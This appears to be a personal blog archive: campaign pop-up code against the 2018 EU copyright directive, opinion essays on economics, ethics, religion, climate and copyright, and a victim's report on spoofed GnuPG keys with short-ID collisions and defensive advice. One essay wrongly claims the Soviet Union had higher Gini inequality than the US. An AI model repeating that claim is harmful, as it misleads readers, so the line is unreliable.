#fsf-dbd-elem-buttons {
}

#fsf-dbd-elem-buttons a {
    width: 100%;
    display: block;
    text-align:center;
    font-size:35px;
    color:#000000;
    text-decoration: none;
    font-family: sans-serif,"Helvetica",Arial;
    font-weight: normal;
}

#fsf-dbd-elem-maybe-later {
    margin-top: 5px;
    margin-bottom: -5px;
}

#fsf-dbd-elem-maybe-later a {
    color: #4298b5;
    line-height: 20px;
    text-decoration: none;
    cursor: pointer;
    font-weight: normal;
    font-family: sans-serif,"Helvetica",Arial;
    font-size: 16px;
}

#fsf-dbd-elem-text {
    text-align: left;
}

#fsf-dbd-elem-text a {
    color: #e64c22;
    font-weight: 700;
    text-decoration: none;
}

#fsf-dbd-elem-text a:hover {
    color: #bc1b1b;
}

#fsf-dbd-elem-text a:focus {
    color: #bc1b1b;
}

#fsf-dbd-elem-text a:active {
    color: black;
}

#fsf-dbd-elem-text p {
    font-family: sans-serif,"Helvetica",Arial;
    font-size: 16px;
    font-weight: normal;
    margin: 0px 0px 10px 0px;
    line-height: 20px;
    color: black;
    text-shadow: 0px 0px 8px #ffffff, 0px 0px 8px #ffffff;
}

#fsf-dbd-elem-text li {
    font-family: sans-serif,"Helvetica",Arial;
    font-size: 14px;
    font-weight: normal;
    margin: 0px 0px 10px 0px;
    line-height: 20px;
    color: black;
    text-shadow: 0px 0px 8px #ffffff, 0px 0px 8px #ffffff;
}
            </style>
            <div id="fsf-dbd-elem-container" style="display: none;">
                <div id="fsf-dbd-elem-outer-v-center">
                    <div id="fsf-dbd-elem-inner-v-center">
                        <div id="fsf-dbd-elem">
                            <div id="fsf-dbd-elem-header">
                                <div id="fsf-dbd-elem-close-button" onclick="fsfDBDElemDontShowAgain();">
                                    <i class="fa fa-close"></i>
                                </div>
                                <h2>Sep. 12th decides the fate of the internet in the EU!</h2>
                            </div>
                            <div id="fsf-dbd-elem-left-column">
                                <div id="fsf-dbd-elem-text">

<p>The <a
href="https://juliareda.eu/eu-copyright-reform/">European Copyright directive</a> threatens online communication in Europe.<ul><li>Article 13 would require every site where you can share to <a href="https://twitter.com/ArneBab/status/1034823956107325440">build or buy massive censorship infrastructure</a>.</li><li>Article 12 would <a href="https://juliareda.eu/2018/09/copyright-sports-fans/">make it illegal to share a photo from a football game</a>.</li><li>Article 11 would require <a href="https://juliareda.eu/2018/09/copyright-showdown/">license fees for links</a>.</li><li>Article 3 would forbid working with information you find online.</ul></p>

<p>But thanks to <a href="https://juliareda.eu/2018/08/saveyourinternet-action-day/">massive shared action earlier this year</a>, the European parliament <a href="https://juliareda.eu/2018/09/copyright-showdown/">can still prevent the problems</a>. For each of the articles there are proposals which fix them. The parliamentarians (MEPs) just have to vote for them. And since they are under massive pressure from large media companies, which went as far as defaming those who took action as <em>fake people</em>, the MEPs <strong>need to hear your voice</strong> to know that you are real.</p>

<p>If you care about the future of the Internet in the EU, please <a href="https://saveyourinternet.eu/">Call your MEPs</a>.</p>

                                </div>
                            </div>
                            <div id="fsf-dbd-elem-right-column">
                                <div id="fsf-dbd-elem-buttons" style="border-radius: 20px;">
                                    <div id="button_0" style="background-color: rgb(230, 76, 34); border-radius: 20px; a {color: rgb(188, 27, 27) !important}; box-shadow: 0px 0px 5px rgba(0, 0, 0, 0.5); margin-bottom: 26.667px;">
                                      <a href="https://saveyourinternet.eu/"><i class="fa fa-check-circle"> </i>Call MEPs</a>
                                    </div>

                                    <div id="button_1" style="background-color: rgb(254, 203, 0); border-radius: 20px; box-shadow: 0px 0px 5px rgba(0, 0, 0, 0.5);">
                                      <a class="long-button-text" href="https://juliareda.eu/2018/09/copyright-showdown/"><i class="fa fa-globe"></i> Learn More</a>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <script type="text/javascript">
// @license magnet:?xt=urn:btih:1f739d935676111cfff4b4693e3816e664797050&dn=gpl-3.0.txt GPL-v3-or-Later

var startTime, switchTextTime, endTime, fsfDBDElemMaybeShow, daysInFuture, fsfDBDElemHide, fsfDBDElemDontShowForDays;

startTime = new Date('2018-08-28T00:00:00Z');
switchTextTime = new Date('2018-09-11T00:00:00Z');
endTime = new Date('2018-09-13T00:00:00Z');

// possibly switch the text that is displayed in the modal window, depending
// upon the current date.
function fsfDBDElemMaybeSwitchText () {

    var now;

    now = new Date();
    if (now.getTime() < switchTextTime.getTime()) {
        return; // don't switch the dbd text
    }

    // switch dbd text
    document.getElementById("fsf-dbd-elem-text").innerHTML =' \
                                    <p> \
\
Tomorrow the European parliament decides the fate of the Internet in the EU! \
\
                                    <\/p>\
                                    <p> \
\
<a href="https://saveyourinternet.eu/">Call your MEPs today</a>! \
\
                                    <\/p>';

    // remove button_0
    var button_0 = document.getElementById("button_0");
    button_0.parentNode.removeChild(button_0);

    // change href in button_1
    document.getElementById("button_1").children[0].href = "https://juliareda.eu/2018/09/copyright-showdown/"
}

// show fsf-dbd-elem if it hasn't been previously closed by
// the user, nor recently hit "maybe later",
// and the campaign is still happening
function fsfDBDElemMaybeShow () {

    var pattern, noShowDBD2018IDADElementP, now;

    now = new Date();
    if (now.getTime() < startTime.getTime() || now.getTime() > endTime.getTime()) {
        return; // don't show the fsf-dbd-elem
    }

    // see if cookie says not to show element
    pattern = /showDBD2018IDADElementP\s*=\s*false/;
    noShowDBD2018IDADElementP = pattern.test(document.cookie);

    if (!noShowDBD2018IDADElementP) {
        setTimeout(function () {
            // display the element
            document.getElementById("fsf-dbd-elem-container").style.display="block";
        }, 0);
    }
}

// call this first to set the proper text
fsfDBDElemMaybeSwitchText();
// call this right away to avoid flicker
fsfDBDElemMaybeShow();


// get the time `plusDays` in the future.
// can be a fraction.
function daysInFuture (plusDays) {
    var now, future;

    now = new Date();
    future = new Date(now.getTime() + Math.floor(1000 * 60 * 60 * 24 * plusDays));
    return future.toGMTString();
}

// hide the fsf-dbd-elem
function fsfDBDElemHide () {
    document.getElementById("fsf-dbd-elem-container").style.display="none";
}
// optionally hide elem and set a cookie to keep the fsf-dbd-elem hidden for the next `forDays`.
function fsfDBDElemDontShowForDays (forDays, hideNow) {
    if (hideNow === true) {
        fsfDBDElemHide();
    }
    //document.cookie = "showDBD2018IDADElementP=false; path=/; domain=.fsf.org; expires=" + daysInFuture(forDays);
    document.cookie = "showDBD2018IDADElementP=false; path=/; expires=" + daysInFuture(forDays);
}

// hide the element from now to past the date of the campaign
function fsfDBDElemDontShowAgain () {
    fsfDBDElemDontShowForDays(120, true);
}
// don't show the element for a while
function fsfDBDElemMaybeLater () {
    fsfDBDElemDontShowForDays(1, true);
}
// keep the element visible for now, but don't show it on future page loads
function fsfDBDElemFollowedLink () {
    fsfDBDElemDontShowForDays(120, false);
}

// close popup if user clicks trasparent part
document.getElementById("fsf-dbd-elem-container").addEventListener("click", function(event){
    fsfDBDElemDontShowAgain();
});
// don't close popup if clicking non-trasparent part (with the text and buttons)
document.getElementById("fsf-dbd-elem").addEventListener("click", function(event){
    event.stopPropagation();
});

// @license-end
                </script>
            </div>
            <!-- end fsf-dbd-elem campaign element -->

copyright directive modal window preview

(this code is based on the day against DRM modal window by the FSF, licensed under GPLv3+)

Attachment: 2018-09-08-copyright-directive-banner-draketo.png (175.21 KB)

Equality and Prosperity go hand in hand

A reply to the common argument for inequality:

Much better to focus on growing the economy than on increasing equality.

This is the old trickle down theory. Homeless people in the US could tell you that growing the economy without increasing equality does not help the poor. The reality is:

Increasing equality increases the long-term growth of the economy.

The trickle-down theory goes against research results. Even the IMF has accepted that equality and prosperity aren’t opposites but rather go hand in hand: The higher the equality, the more sustained growth a country experiences (PDF).

"Against this background, the question is whether a systematic look at the data supports the notion that societies with more equal income distributions have more durable growth."

"a 10 percentile decrease in inequality (represented by a change in the Gini coefficient from 40 to 37) increases the expected length of a growth spell by 50 percent."

They show that the income distribution is the largest single governing factor for the length of a growth period.

Also the Soviet Union had a higher Gini coefficient than the US.

The Gini coefficient measures inequality: The higher it is, the higher the inequality. So the Soviet Union had higher inequality than the US at the time.
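
As a rough illustration of what the coefficient measures (my own example, not from the cited IMF paper): the Gini coefficient is half the mean absolute difference between all pairs of incomes, divided by the mean income.

    def gini(incomes):
        """0 means perfect equality, values near 1 mean one person gets everything."""
        n = len(incomes)
        mean = sum(incomes) / n
        abs_diff_sum = sum(abs(a - b) for a in incomes for b in incomes)
        return abs_diff_sum / (2 * n * n * mean)

    print(gini([10, 10, 10, 10]))   # 0.0  -> perfect equality
    print(gini([0, 0, 0, 40]))      # 0.75 -> extreme inequality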

That’s a nice way to counter the specter of evil communism which is invoked almost every time someone talks about increasing equality. The Soviet Union had less equality than the US at that time; consequently its growth was weaker.

We do not threaten our prosperity with higher equality. The opposite is true. And we also don’t follow the path of the Soviet Union. The opposite is true.

If all else is equal, higher equality and higher prosperity go hand in hand. Higher equality helped the west to win the economic competition against the Soviet Union.

Therefore the reality is:

To focus on growing the economy we must increase equality.

How to make companies act ethically

→ comment on Slashdot concerning Unexpected methods to promote freedom?

Was it really Apple who ended DRM? Would they have done so without the protests and evangelizing against DRM? Without protesters in front of Apple Stores? And without the many people telling their friends to just not accept DRM?

That “preaching” created a situation where Apple could reap monetary gain from doing the right thing. You see how they act when the stakes are different.

What you can do to make companies act ethically is to create a situation where they can make more money by working ethically than by ripping you off. The ways to do that are

  1. Laws (breaking them costs money when you get caught),
  2. Taxes on doing the wrong thing (i.e. pollution),
  3. Offering your work in ways which make it easier for people to make money ethically than unethically (that’s what copyleft licensing does),
  4. Trying to convince people to do 3,
  5. Trying to convince people to shun products which are created unethically (that’s what you call preaching),
  6. Only paying for products which were produced ethically.

RMS does 3, 4, 5 and 6, so he’s pretty much into gaming the market - and “preaching” is only one of the tools in his box. Though what he does is more convincing than preaching: He gives us reasons why unfree software is bad - and the mental tools to resist the preaching from the other side (for example via analyses of speech-tricks, like calling state-granted monopolies “property”).

Never trust a company

Answer to a thread in the Gnutella-Forums where people bashed LimeWire for putting money first.

They are a company, and you don't trust companies. Not because they are evil, but because they have to think of money first and foremost.

If they do not put money first, they go down and others come up who do - and their employees will lose their job. At least as long as people still buy products without regard for ethics.

I hold them in very high esteem for GPL-ling LimeWire and for standing up against the lawsuit.

They are a company, and that makes them non-trustworthy, but because they are a company, they can fight a battle which none of us others could fight.

Never trust a company, but don't condemn them for putting money before morals or ethics from time to time, as long as they don't do it all the time. You only know they are going down a dark road if they do harm even where it goes against economic sanity.

And never ever deal with... - a Shadowrun saying :)

PS: Also keep in mind that a company on the stock market might actually be forced to do unethical but profitable things, because the CEO is liable to the shareholders and could personally face legal action when refusing them. If it is not on the stock market, the company has a responsibility to its employees. Which is why you as a customer can never trust it even if the owners are all well-meaning folks — though they might act in your interest most of the time, so expecting betrayal all the time would also be wrong. They would have to be very strong in ideology to put your well-being over the well-being of their employees (judge for yourself whether they would then actually be good).

I agree with just one of the 10 commandments of judaism and christianity

Many christians and many people who talk about “western christian values” like to say that the 10 commandments are universal: everyone can agree with them. So I checked that. I take them by their name: are they suitable as commandments? Not as a fuzzy general guideline, but as binding rules and a foundation for a shared culture?

(1.0) I am god who lead you from slavery in egypt → uhm, no?

(1.1) You shall not have other gods → uhm, why? I have pagan friends, so: no.

(1.2) You shall not represent me as anything which exists → that might make sense: don’t divide by different representations. But it did not work out, as now people picture angels, saints, and so on (and god, too). Also it’s part of commandment 1, so overall no to commandment 1.

(2) You shall not misuse my name → oh god, that really worked, right? no.

(3) No one close to you may work on sunday → and he went to the hospital and… no.

(4) Honor your parents → who might have abused you. No.

(5) Don’t murder → murder is defined nowadays as killing for low motives. So yes (with the right definition of low motives).

(6) Don’t break your marriage → if your wife/husband agrees, why not? So no.

(7) Don’t steal → if you would starve otherwise or the other one created monopolies for himself to oppress you: why not? So no.

(8) Don’t bear false witness → sounds mostly ok. Except if you want to save someone from a mob. So even this is not fit for a general rule. We even have laws which allow bearing false witness when asked illegal questions in a job interview. So no.

(9) Don’t desire the wife of another → why not? What if she desires you, too, and he does not mind? So no.

(10) Don’t desire property of others → be a nice little slave. Desire does not hurt anyone, and it can be a big motivation. So no.

Of the 10 commandments there is only one I agree with: Don’t murder (do not kill out of low motives). All the rest are either petty restrictions which aren’t needed in a free society or would be harmful if people actually always followed them closely.

Note that even for the one commandment I agree with, I only agree with the original version, not with what is currently taught (do not kill).

So the ten commandments are ill suited as a “foundation of western values”. The actual foundation of western values seems to take inspiration from them, but follows from much deeper values like preserving human dignity, valuing every human1, being reliable, and only limiting individual freedom where the freedom of others begins.


  1. Christian storytelling gave this a focus on valuing children and wanting them to enjoy their childhood, which may actually be part of the foundation for good elements of the western education systems. 

I w̶a̶s̶ t̶a̶r̶g̶e̶t̶e̶d̶ got hit by an attack on GnuPG/PGP

Update: Might not actually be targeted. See Evil 32. Thanks to Ximin Luo for giving me more peace of mind!

Update: I’m not the only one hit by this. Here’s a conversation on GNU social with more people hit - though no one else reported yet having two keys faked and cross-signed.

Update: At the very least you should do this: echo keyid-format long >> ~/.gnupg/gpg.conf

On the 29th of August a colleague asked me “which key should I use to encrypt to you?” I was confused, because I only have one key for that email address. So he showed me the keys he saw:

$ gpg2 --list-keys --fingerprint arne.babenhauserheide
-------------------------------
pub   2048R/A70DA09E 2011-10-07 [expires: 2016-10-05]
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
sub   2048R/39829E5F 2011-10-07 [expires: 2016-10-05]

pub   2048R/A70DA09E 2014-06-16 [revoked: 2016-08-16]
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>

What’s happening here?

At first I thought “did I accidentally create and upload a new key?”

Then I noticed the key IDs:

pub 2048R/A70DA09E 2011-10-07 [expires: 2016-10-05]
pub 2048R/A70DA09E 2014-06-16 [revoked: 2016-08-16]

They are the same. But with different creation date, and one of them revoked. Was that a bug? Did I really revoke my key? Did someone break into my computer and steal the private key? I felt a moment of panic.

Then I remembered an article about spoofing keys by brute forcing partially equal fingerprints. Note that what you see as IDs is only a small part of the real identifier, and that what every tutorial on GnuPG tells you to verify is not the ID but the fingerprint: The full identifier.

After taking a deep breath, that’s what we did. The results showed clearly that what we had seen was an actual attack on my key - though one that had just ended:

pub   2048R/A70DA09E 2011-10-07 [expires: 2016-10-05]
      Key fingerprint = DC44 49A9 A0C9 9632 9897  1842 5C83 F364 A70D A09E
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
sub   2048R/39829E5F 2011-10-07 [expires: 2021-08-28]

pub   2048R/A70DA09E 2014-06-16 [revoked: 2016-08-16]
      Key fingerprint = FA7F DA53 89DC 30F0 385B  FC4A EA32 F8E6 A70D A09E
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
     (also: expires: 2016-10-05)

Note the matching IDs and the matching two blocks of the fingerprint (which are just what’s shown in the ID), while the rest of the fingerprint is clearly different.
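
To see why matching IDs are cheap to produce, here is a small Python sketch (my own illustration, using the two fingerprints shown above): for OpenPGP v4 keys the short 8-character ID is nothing but the last 32 bits of the 160-bit fingerprint, so an attacker only has to brute-force keys until those last 8 hex characters collide.

    # The two fingerprints from the listing above, with the spaces removed.
    real = "DC4449A9A0C99632989718425C83F364A70DA09E"
    fake = "FA7FDA5389DC30F0385BFC4AEA32F8E6A70DA09E"

    def short_id(fingerprint):
        """The short key ID is just the last 8 hex characters (32 bits)."""
        return fingerprint[-8:]

    print(short_id(real))           # A70DA09E
    print(short_id(fake))           # A70DA09E -> same short ID, different key!
    print(real[-16:], fake[-16:])   # the long (64 bit) IDs already differ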

In a modern gpg setup, the key should have been shown with a 16 letter ID, so we would have seen the difference, but if the creation date is correct, these keys were made 2 years ago (though this could be faked easily by simply changing the date on the computer doing the computation). And my local gpg still shows the shorter 8 letter ID, just like the one from my colleague. If you request my key with gpg --recv-key A70DA09E, you could actually get the fake key!

Is this an attack?

Let’s relax for a moment. How do I know that this isn’t just someone experimenting with fake keys for fun?

I don’t strictly know, but there are strong indicators:

  1. The fake key has the same description as my main key.
  2. The expiration date is set to the expiration date of my main key (this is easy to do, since it can be adjusted without changing the fingerprint).
  3. My key for my other email address was targeted, too:
pub   1024R/FE96C404 2014-06-16 [revoked: 2016-08-16]
      Key fingerprint = A000 B099 C138 B7EE 4C19  1D8F 895D BE4E FE96 C404
uid                  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>

pub   1024D/FE96C404 2002-02-04
      Key fingerprint = 6B05 41F0 94FF 2163 6FBA  2433 3307 469B FE96 C404
uid                  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
uid                  Arne Babenhauserheide (Rollenspieler, Spinner und freiberuflicher Weltenbastler) <arne_bab@yahoo.de>
uid                  Arne Babenhauserheide (Eine selbstbewusste Gesellschaft kann viele Narren ertragen) <arne_bab@web.de>
uid                  Arne Babenhauserheide (Rollenspieler, Spinner, Physikliebhaber, Gurpser und freiberuflicher Weltenbastler) <arne_bab@web.de>
sub   1024R/0BC10548 2010-07-29
sub   1024R/95806B33 2010-07-29
sub   1024g/0136732E 2002-02-04

With this it looks like this was a targeted attack, trying to trick people into encrypting to the attackers instead of me — or in addition to me (which could easily happen when they use a GUI which selects all matching keys by default).

How can I protect myself?

This isn’t actually attacking the crypto in GnuPG but rather uses the weakest link: human oversight. To protect yourself against this, always check the full fingerprint before you use a key.

And if you download a key from someone you did not meet yet, always check the signatures on the key, before you use it for the first time. For example like this:

gpg --check-sigs "<fingerprint or email>"
gpg --check-sigs "arne.babenhauserheide@kit.edu"
pub   2048R/A70DA09E 2011-10-07 [expires: 2021-08-28]
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
sig!         FE96C404 2011-11-07  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
sig!3        A70DA09E 2016-08-29  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
sig!3        A70DA09E 2011-10-07  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
sub   2048R/39829E5F 2011-10-07 [expires: 2021-08-28]
sig!         A70DA09E 2016-08-29  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>

pub   1024R/FE96C404 2014-06-16 [revoked: 2016-08-16]
rev!         FE96C404 2016-08-16  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
uid                  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
sig!3        FE96C404 2014-08-04  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
sig!         A70DA09E 2014-08-05  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>

100 signatures not checked due to missing keys

You can see that my real key has signatures from people I know. The raw number of signatures also helps here, but it is easy to fake by just creating more fake keys, so do not rely on it for security. If you think “but they would not”, have a second hard look at the list above (and kudos if you spotted it right now!). The attacker actually signed the fake key for arne.babenhauserheide@kit.edu with the other fake key he or she created for arne_bab@web.de (and vice versa)!

You cannot distinguish these keys by looking at my keys alone!

However this is not perfect: it shows all those missing keys but not how to get them. I should file a bug for changing that.

And refer to the key by its fingerprint, so you don’t accidentally tell gpg to use the wrong key.

Summary

I was likely targeted by an attack which tried to trick people into encrypting to the wrong keys by creating new keys which looked exactly the same as my two main keys in the default key listing. These keys were revoked about a month ago, so it is likely that this attack just ended.

The attack used the keyservers as vector, combined with the UI and convenience policy of client programs. It did not break the encryption in gpg.

To protect yourself and others against being a victim of attacks like this, always check the fingerprint, be wary of duplicated keys and, most importantly, sign the keys of people you know — after checking the fingerprints! And use the fingerprints for signing!

The fingerprints of my main keys:

$ gpg2 --list-keys --fingerprint arne
pub   2048R/A70DA09E 2011-10-07 [verfällt: 2021-08-28]
  Schl.-Fingerabdruck = DC44 49A9 A0C9 9632 9897  1842 5C83 F364 A70D A09E
uid       [ uneing.] Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
sub   2048R/39829E5F 2011-10-07 [verfällt: 2021-08-28]

pub   1024D/FE96C404 2002-02-04
  Schl.-Fingerabdruck = 6B05 41F0 94FF 2163 6FBA  2433 3307 469B FE96 C404
uid       [ uneing.] Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
uid       [ uneing.] Arne Babenhauserheide (Rollenspieler, Spinner und freiberuflicher Weltenbastler) <arne_bab@yahoo.de>
uid       [ uneing.] Arne Babenhauserheide (Eine selbstbewusste Gesellschaft kann viele Narren ertragen) <arne_bab@web.de>
uid       [ uneing.] Arne Babenhauserheide (Rollenspieler, Spinner, Physikliebhaber, Gurpser und freiberuflicher Weltenbastler) <arne_bab@web.de>
sub   1024R/0BC10548 2010-07-29
sub   1024R/95806B33 2010-07-29
sub   1024g/0136732E 2002-02-04

pub   1024D/2F6F2642 2004-10-28
  Schl.-Fingerabdruck = 7172 BE09 9661 8A67 0D70  E801 E8B2 C3EB 2F6F 2642
uid       [ vollst.] Arne Babenhauserheide (Dust: Dumb Unsuspecting STudent) <arne_bab@web.de>
sub   1024g/14FAA61F 2004-10-28

pub   4096R/FF8DA6F0 2016-03-16
  Schl.-Fingerabdruck = AFCE FDAA A09E 3014 367C  7384 7D0A B287 FF8D A6F0
uid       [ vollst.] "Arne Bab." <Arne_Bab@web.de>
sub   4096R/CE39F489 2016-03-16

pub   4096R/2403C3EB 2016-01-04
  Schl.-Fingerabdruck = F34D 6A12 35D0 4903 CD22  D5C0 13EF 8D45 2403 C3EB
uid       [ vollst.] Arne Babenhauserheide (Drak) <arne_bab@web.de>
sub   4096R/D0E0B44C 2016-01-04

pub   4096R/8A8AAA50 2016-08-29 [verfällt: 2021-08-28]
  Schl.-Fingerabdruck = B5B3 AC76 6695 D1E3 4E0B  9075 B598 1EEC 8A8A AA50
uid       [ uneing.] Arne Babenhauserheide (-) <arne.babenhauserheide@kit.edu>
sub   4096R/A017ECEC 2016-08-29 [verfällt: 2021-08-28]

For additional security you should check the copy of this article in Freenet1, where the fingerprints are protected by crypto which cannot be faked as easily as that from this site, because the keys stay on the local machine and cannot be changed by breaking into a remote machine.

Note that I extended the expiration date of my keys after my colleague told me about the revoked keys, because my keys were about to expire.

And if you see something like the following, you have every reason to increase your operational security:

pub   2048R/A70DA09E 2011-10-07 [expires: 2021-08-28]
      Key fingerprint = DC44 49A9 A0C9 9632 9897  1842 5C83 F364 A70D A09E
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
sub   2048R/39829E5F 2011-10-07 [expires: 2021-08-28]

pub   2048R/A70DA09E 2014-06-16 [revoked: 2016-08-16]
      Key fingerprint = FA7F DA53 89DC 30F0 385B  FC4A EA32 F8E6 A70D A09E
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>

pub   1024D/FE96C404 2002-02-04
      Key fingerprint = 6B05 41F0 94FF 2163 6FBA  2433 3307 469B FE96 C404
uid                  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
uid                  Arne Babenhauserheide (Rollenspieler, Spinner und freiberuflicher Weltenbastler) <arne_bab@yahoo.de>
uid                  Arne Babenhauserheide (Eine selbstbewusste Gesellschaft kann viele Narren ertragen) <arne_bab@web.de>
uid                  Arne Babenhauserheide (Rollenspieler, Spinner, Physikliebhaber, Gurpser und freiberuflicher Weltenbastler) <arne_bab@web.de>
sub   1024R/0BC10548 2010-07-29
sub   1024R/95806B33 2010-07-29
sub   1024g/0136732E 2002-02-04

pub   1024R/FE96C404 2014-06-16 [revoked: 2016-08-16]
      Key fingerprint = A000 B099 C138 B7EE 4C19  1D8F 895D BE4E FE96 C404
uid                  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>

  1. Once you have Freenet running, just open this link: USK@V~1bZXDO1YhvvyYoYVivW-GTwqCTqaBovBM2ad7vd2E,XnsG558vT1nDLezaPpN5TGXJqZ73~wb3funZeCLWyeo,AQACAAE/gnupg-attack/0/ (but if you cannot trust this website, better check my long-lived site in Freenet (you can find it in several indexes) for a link to that article. If you happen to get a different link here than what I link on random_babcom, please get in touch!) 

If one dozen people stop eating beef, how much will this help to slow down global warming?

If one dozen people stop eating beef, this will reduce the yearly global CO₂ emissions by around 48 tons of CO₂-equivalent1 (about one quarter of their total emissions, and half their emissions from food).

That’s the equivalent of planting about 48 trees per year, with the assumption of an old tree weighing 1 tonne, half of which is carbon. CO₂ mass is carbon mass times (44 / 12), but an average tree in a forest has less than that, because trees don’t start out as old trees, so you get roughly 1 ton of net CO₂ absorption per newly planted tree.

So if you assume that the one dozen people will still live for 50 years without eating beef, they will have done as much good for the climate as if they had planted 2,400 trees. That’s roughly a forest with a size of 5 hectares (assuming 50,000 trees per km²).
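
As a quick sanity check, here is the arithmetic from the text as a small Python sketch (my own illustration; the 4 tons of CO₂-equivalent saved per person and year follow from the 48 tons for one dozen people stated above):

    people = 12
    saving_per_person = 4                          # t CO2e per year without beef
    yearly_saving = people * saving_per_person     # 48 t CO2e per year
    co2_per_tree = 1                               # t net CO2 bound per planted tree
    trees_per_year = yearly_saving / co2_per_tree  # ~48 trees per year
    years = 50
    total_trees = trees_per_year * years           # 2400 trees
    trees_per_km2 = 50_000
    forest_hectares = total_trees / trees_per_km2 * 100   # 1 km² = 100 ha
    print(yearly_saving, total_trees, forest_hectares)    # 48 2400.0 4.8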


  1. For beef, part of this CO₂-equivalent is due to methane, which has a lifespan of only around 10 years, so the actual improvement isn’t as long-lasting as actually planting a forest: You won’t see much of the methane-reduction after 200 years, but the forest will still hold carbon. So please plant trees.

Internet, community cloud foo and control of my own data

Why?

What I miss in the internet is the notion of being able to control what my apps access for data.

Why can’t a chat application just connect to a neighborhood- or community-server, and why can’t the activity-stream come from the people I know — and query only their systems, like jabber does?

Almost all geolocation services should be implementable over direct friend-to-friend connections like jabber, and I don’t really see why my local identi.ca program can’t also get the news from my local jabber contacts.

Or why I can’t set a local info-provider as geolocation source and have a “phone-book” of info-providers in each town.

And when it can do that, why can’t I have a general info-server which serves as synchronization and aggregation service for any of my devices, so all my programs on any device know which sources to use?

And why can’t I tell that server to allow my friends to access a subset of my data — selected by me?

Sadly I assume that the answer is “power”. Google and Apple don’t want to lose their control on synchronization and sharing. Otherwise most of the control and centralization (=moneymaking monopoly) of the internet would fade away.

What?

For example I’d like to be able to select whose information I get, and I’d like to be able to also get the information my friends and their friends get. Without anyone outside knowing that I access that data (because I ask them directly). And ideally also without me knowing from which of their friends the data originates, but still being able to block those individually.

Then I could allow certain product information providers (=good advertisers) inside my network, so I get news about stuff I might like to spend money on. And automatically get information about the info-providers from my friends — or my community.

And all that without direct dependency on a single company or system.

It would make it infeasible to monopolize the services without making everyone trust you — and having to make sure most people trust you creates a reverse-dependency which could help to keep the information-providers honest.

How?

And I think one key to that is to make that service less like full storage and more like an update-collecting and synchronization service.

There’s no reason why a synchro-server should keep any data I already pulled to all my devices.

This would be similar to using a Mercurial push-cache of sorts: When I push data to a service, it just stores a bundle against the revision of the data on my least up-to-date device. All my devices can access that bundle, and when all of them are up to at least a certain state, the now useless data gets stripped out and only the new data remains.

Not yet pulled information could be stored as snapshots, until the first of my devices pulls it. Then it could get replaced by synchronization data — a compressed update-bundle. That would also make sure that incoming data has to be integrated and parsed only once.
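
As a rough sketch of that idea (my own illustration, not an existing protocol), such an update-collecting server could look like this: it keeps one bundle per pushed revision and strips everything that every device has already pulled.

    class SyncCache:
        """Keep only the updates which at least one device still needs."""
        def __init__(self, devices):
            self.device_revision = {name: 0 for name in devices}
            self.pending = {}   # revision -> update bundle

        def push(self, revision, bundle):
            """Store an update bundle produced for the given new revision."""
            self.pending[revision] = bundle

        def pull(self, device):
            """Hand a device every bundle newer than what it already has."""
            have = self.device_revision[device]
            updates = {rev: b for rev, b in self.pending.items() if rev > have}
            if updates:
                self.device_revision[device] = max(updates)
            self._strip()
            return updates

        def _strip(self):
            """Drop bundles which every device has already pulled."""
            oldest = min(self.device_revision.values())
            self.pending = {rev: b for rev, b in self.pending.items() if rev > oldest}

    cache = SyncCache(["laptop", "phone"])
    cache.push(1, "bundle with new messages")
    cache.pull("laptop")        # the laptop gets the bundle, the phone still needs it
    cache.pull("phone")         # now everyone has it, so the bundle gets stripped
    print(cache.pending)        # -> {}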

http://mercurial-scm.org/

Maybe Akonadi (from KDE) can someday accomplish something like that.

http://userbase.kde.org/Glossary#Akonadi
http://en.wikipedia.org/wiki/Akonadi

PS: Originally this started as a comment to The state of the internet operating system by O’Reilly.

My answers to the Public Consultation on the review of the EU copyright rules.

The following PDF and ODF contains my answers to the Public Consultation on the review of the EU copyright rules.

If you want to comment, please use the contact form.

PS: And now I hear that the commission is trying to get into treaties with Canada (CETA) which make any positive changes to copyright impossible: CETA: Mehr Rechte für Musikkonzerne (german). I signed a petition against CETA (german) - maybe it’s time to march the streets again. But what do we actually need to change to stop these ever repeating attacks on our digital life?

Attachment: 2014-03-04-eu-copyright-consultation-document_en-arne_babenhauserheide.odt (73.84 KB)
Attachment: 2014-03-04-eu-copyright-consultation-document_en-arne_babenhauserheide.pdf (323.97 KB)

Neither Humble nor Indie Bundle

Update 2016: Later Bundles seem to have gotten better again.

Comment to New Humble Bundle Is Windows Only, DRM Games.

The new Humble Indie Bundle is no longer free, indie, cross-platform or user-respecting.

When the first bundle had a huge boost in last-minute sales after the devs offered to free the source of 4 of the 5 games, I had hoped they would keep that. I was one of those who paid when they offered to free the games, and I’m pretty sure that they got a huge boost in people who knew the Humble Indie Bundle because of that.

But when the second bundle did not offer freeing the source, I did not pay. Unfree games aren’t worth much to me and I feared they would go further down that track.

Now Steam comes to GNU/Linux, so being cross-platform isn’t unique to the Humble Indie Bundle anymore. And they dropped cross-platform support and added DRM. They replaced fans with short-term cash-cows who will happily switch to another project without second thoughts. Somehow I saw that coming…

